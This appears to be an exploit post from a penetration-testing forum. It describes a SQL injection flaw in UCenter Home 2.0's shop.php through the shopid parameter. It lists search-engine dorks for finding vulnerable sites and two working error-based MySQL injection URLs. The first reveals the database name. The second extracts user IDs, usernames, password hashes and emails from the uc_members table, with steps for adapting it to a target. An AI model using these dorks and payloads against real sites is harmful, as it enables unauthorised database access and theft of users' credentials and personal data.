China Network Penetration Testing Alliance
Title: UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability
Author: admin
Time: 2013-2-27 21:31

__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__

*/ Author : KnocKout
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
*/ Contact: knockoutr@msn.com
*/ Cyber-Warrior.org/CWKnocKout

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Script : UCenter Home
Version : 2.0
Script HomePage : http://u.discuz.net/

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Dork : Powered by UCenter inurl:shop.php?ac=view
Dork 2 : inurl:shop.php?ac=view&shopid=

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

Vuln file : Shop.php
Values : (?)ac=view&shopid=
Vulnerability type : SQL Injection (MySQL Error Based)
Needed materials : Hex Conversion

__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==

You need the victim database name.

for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1

..

DB : Okay.

Edit the DB name: `[TARGET DB NAME]`

Example : 'hiwir1_ucenter'

Edit : Okay.

Use hex conversion and edit your SQL injection exploit.

Exploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1